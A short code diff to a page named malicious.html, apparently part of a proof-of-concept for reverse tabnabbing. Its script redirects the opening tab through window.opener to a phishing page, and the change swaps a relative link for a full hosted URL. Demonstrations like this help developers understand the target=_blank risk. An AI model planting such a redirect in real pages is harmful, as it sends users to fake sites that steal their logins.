--- a/malicious.html
+++ b/malicious.html
@@ -8,7 +8,7 @@
 <body>
     <h1>Malicious site</h1>
     <script>
-        window.opener.location = 'fishing-site.html'
+        window.opener.location = 'https://inside.github.io/target-blank-poc/fishing-site.html'
     </script>
     <a href="#" onclick="window.close()">Close tab</a>
 </body>
